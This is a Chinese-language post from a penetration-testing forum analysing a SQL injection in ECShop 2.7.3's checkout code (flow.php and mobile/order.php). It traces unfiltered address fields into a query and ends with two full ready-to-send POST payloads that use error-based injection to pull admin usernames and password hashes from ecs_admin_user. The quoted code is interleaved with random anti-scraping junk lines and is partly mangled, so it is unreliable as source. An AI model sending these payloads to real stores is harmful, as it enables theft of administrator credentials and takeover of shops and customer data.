中国网络渗透测试联盟

标题: ecshop全版本注入分析 [打印本页]

---

作者: admin    时间: 2013-1-13 09:48
标题: ecshop全版本注入分析
前段时间大概2012年圣诞节左右，在t00ls上看见ecshop全版本注入，当时也下载了最新的程序分析了下,最近考试比较忙，今天刚考完，把我分析的记录下来。

    漏洞关键文件：

    /includes/lib_order.php
# h- R( \' h( `* ]3 q: U, R4 s+ S2 }* ^
1 F' s2 R( n6 U    关键函数：

! v; C4 C! i5 L
1 J$ T+ i6 |- m) E
01     function available_shipping_list($region_id_list)
1 J8 j# ]1 R9 y0 Q7 W
! Q% G# K; H: W3 @# e! d) p02 {
; H! m3 e  Z: @( z+ T& i
) I4 |8 N; U! Z/ @5 @2 x0 R) C& d03     $sql = 'SELECT s.shipping_id, s.shipping_code, s.shipping_name, ' .
" f5 X/ l; {( s. p" R
- S& V9 P1 j. N% g04                 's.shipping_desc, s.insure, s.support_cod, a.configure ' .

05             'FROM ' . $GLOBALS['ecs']->table('shipping') . ' AS s, ' .

06                 $GLOBALS['ecs']->table('shipping_area') . ' AS a, ' .

/ T: \# U% |% m9 R07                 $GLOBALS['ecs']->table('area_region') . ' AS r '.
3 I! p, @' _/ R5 t: C
0 Z5 A( e: Q5 {8 @08             'WHERE r.region_id ' . db_create_in($region_id_list) .
& l5 t0 _0 b3 r5 ~4 x8 m7 `
3 d+ j! A( W/ w, I09             ' AND r.shipping_area_id = a.shipping_area_id AND a.shipping_id = s.shipping_id AND s.enabled = 1 ORDER BY s.shipping_order';

10   

11     return $GLOBALS['db']->getAll($sql);
$ U& X- F5 I6 ?
12 }

! ]  K2 \" e3 X显然对传入的参数没有任何过滤就带入了查询语句。
; z% i, q! h' P- O5 u& g+ m' |1 i; P& f
下面我们追踪这个函数在flow.php中：
. z0 ]4 k* }7 I( `/ A 第531行：   

4 I' |( E: s- g1 $shipping_list     = available_shipping_list($region);
* {( l: o* y5 y2 N5 `



) Z) N9 a, z0 k* I! k: D5 f+ ?0 W
, O# b; v4 |+ I6 r0 x2 M+ n0 u8 G再对传入变量进行追踪：

! C, j2 c6 G, ^' L& S5 d( m% A* Q+ o第530行：   
- ]  y. q( o9 q1 X/ H
1 $region = array($consignee['country'], $consignee['province'],$consignee['city'], $consignee['district']);


/ Q7 K9 E* `4 W; @& s

8 d% |, I$ e6 g7 J
第473行：        

1 $consignee = get_consignee($_SESSION['user_id']);

到了一个关键函数：

( Z" n$ ~8 a/ S: }$ {- N3 K/includes/lib_order.php


( O3 v8 d8 m. z3 K' s- ?0 B

. B4 k  w& W9 E5 K! N" |
01 function get_consignee($user_id)

02 {
( ~3 S: _# E* L* i" E
03     if (isset($_SESSION['flow_consignee']))
3 G8 Q+ w- f1 N5 c# l" U8 P# r
/ }; j7 @1 [' V) \, U04     {

05         /* 如果存在session，则直接返回session中的收货人信息 */
  v3 k3 Q7 a/ J7 P- W
06   
$ B6 z# F. R5 ~
07         return $_SESSION['flow_consignee'];
9 y( w8 ~9 A" J5 W
* w% v  A0 w( Y6 m08     }
7 k# T( U/ I* l" R' W5 v: P  p6 S7 K
09     else

10     {

0 J/ ]' o; X9 C( F4 b& ~' `2 b11         /* 如果不存在，则取得用户的默认收货人信息 */

9 \# Y) ]0 R8 A5 y12         $arr = array();
5 T% F* V0 f" h0 p$ m2 {  \
! b" Z! ], c. h" p& r13   
* r3 J" u  ], n! D( `2 k
. l) `+ h* P* _6 ?14         if ($user_id > 0)

$ D# F! N9 E4 D& E15         {
* X! e9 b% T5 p' [; l4 S* K& B! i9 Y
16             /* 取默认地址 */
3 c( ]3 g! u- \' H" Y
17             $sql = "SELECT ua.*".
- X$ t2 N: t1 `
2 g9 @* \7 p7 o$ `- C18                     " FROM " . $GLOBALS['ecs']->table('user_address') . "AS ua, ".$GLOBALS['ecs']->table('users').' AS u '.

" b4 c3 a" h6 o. I# U, a19                     " WHERE u.user_id='$user_id' AND ua.address_id = u.address_id";
9 s, C' o9 H4 u) d
8 X3 d0 Z& Z1 d9 }* A' @. `20   

21             $arr = $GLOBALS['db']->getRow($sql);
+ j0 N9 t+ T5 ~& z: W) {  y
5 Y0 J2 h5 c( k; G# o" J9 A6 P/ i22         }

23   
5 z6 \3 J# S# j' h# h/ I  T
  e3 N5 ?& ?: ^% j4 x% E24         return $arr;

- h8 `% F! D  N2 j( ~- |25     }

26 }

显然如果 isset($_SESSION['flow_consignee']存在就直接使用。到底存不存在呢？


+ m# Y9 W4 h, c
- X/ a% X, x. l' Y关键点:

第400行：    $_SESSION['flow_consignee'] = stripslashes_deep($consignee);

5 k% y7 Z+ f7 H% C- |  x; a这里对传入参数反转义存入$_SESSION中。

* j5 `0 D4 h, K8 }) s- C
4 B/ `; H/ K! g/ ^' e) ~- Q
; [! b% @7 A; l% o3 w9 v% n' D然后看下：
# z2 d. ?0 n- [, M9 H% b. }
- m4 x, u6 j* r: f& \

   

01 $consignee = array(
0 ?& V, @8 p5 i0 M
02         'address_id'    => empty($_POST['address_id']) ? 0  :intval($_POST['address_id']),
; x& e2 Y  g+ F7 I6 ?5 j
03         'consignee'     => empty($_POST['consignee'])  ? '' : trim($_POST['consignee']),

04         'country'       => empty($_POST['country'])    ? '' _POST['country'],
8 \; M8 A8 h/ z
& t! q. C3 N* V: y0 e& {05         'province'      => empty($_POST['province'])   ? '' _POST['province'],

! u0 |$ B3 N3 A* b1 ]2 [' u3 K5 D06         'city'          => empty($_POST['city'])       ? '' _POST['city'],
% L/ C7 `/ \1 |4 A* B) S4 z
6 v& F  _$ c0 t' ^0 `6 t( I& Q4 g9 r$ _07         'district'      => empty($_POST['district'])   ? '' _POST['district'],
* x5 }5 g- a: T7 Y
08         'email'         => empty($_POST['email'])      ? '' _POST['email'],

09         'address'       => empty($_POST['address'])    ? '' _POST['address'],

10         'zipcode'       => empty($_POST['zipcode'])    ? '' : make_semiangle(trim($_POST['zipcode'])),

11         'tel'           => empty($_POST['tel'])        ? '' : make_semiangle(trim($_POST['tel'])),
2 h! x& v! u1 L2 d0 ~3 b; b$ O* c
12         'mobile'        => empty($_POST['mobile'])     ? '' : make_semiangle(trim($_POST['mobile'])),

( |2 ]( M6 @/ e13         'sign_building' => empty($_POST['sign_building']) ? '' _POST['sign_building'],

14         'best_time'     => empty($_POST['best_time'])  ? '' _POST['best_time'],

15     );
% N+ N$ `% D3 h% T7 @
7 e* Q' J- G5 M! ?' x好了注入就这样出现了。

/ }, r$ r1 o! Y; a2 N==================
/ G* b3 ^1 F. {/ M
注入测试：
8 \- l) I0 F3 Y/ f% T1 T' K
环境:windows7+xampp1.7.7(Apache2.2.21+Php 5.3.8+Mysql 5.5.16)

测试程序：ECShop_V2.7.3_UTF8_release1106



1.首先需要点击一个商品加入购物车

! S3 y, H8 B7 Y) G2.注册一个会员帐号

3.post提交数据


3 f  s& V5 Q/ s( w" p
1 n  u$ \; `/ {0 Y: G1 http://127.0.0.1/ecshop/flow.php
; g7 z1 w- X0 {3 g. N: F
" e) @% d- x1 t9 \+ H2   
0 U# ]4 e6 i7 M  B% V7 \3 v& [
* d0 f7 P# m! w1 `/ j0 R+ t3 country=1&province=3') and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&step=consignee&act=checkout&address_id=
, `; \# x7 ?6 x举一反三，我们根据这个漏洞我们可以继续深入挖掘：
" d# b5 U5 }+ }# W3 b, r
3 ~, P+ [- _( c' r. m! I我们搜寻关键函数function available_shipping_list()
( E  p" B: j: H: l3 y0 P
在文件/moblie/order.php中出现有，次文件为手机浏览文件功能基本和flow.php相同，代码流程基本相同
; N, R5 v4 e0 P0 V5 j
+ x$ ]9 _1 |1 K1 d, @0 e利用exp:
: F8 e# f  Q1 A- F
- X' M8 w* M9 ?* O1.点击一个商品，点击购买商标

+ x. u, l/ n3 A$ m# z7 A' Z* q% t$ J2.登录会员帐号
1 o2 c, C9 P, ]8 o, D4 H
+ \2 }# D, m8 S7 M- R6 g3.post提交：
' C+ C/ {) M2 ?
3 Z: S" l7 i$ C; S2 v5 bhttp://127.0.0.1/ecshop/mobile/order.php
7 F' C6 \0 H( ^2 k2 ^0 K6 \
  T* c! s! W# y- Z' k- g! Y& A4 U6 }
9 N: F* m5 ?( w( P, D0 G
, D/ g: }+ R0 P6 ]) ?3 A* ^% w5 hcountry=1&province=3') and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&&act=order_lise&address_id=

---

欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)

Powered by Discuz! X3.2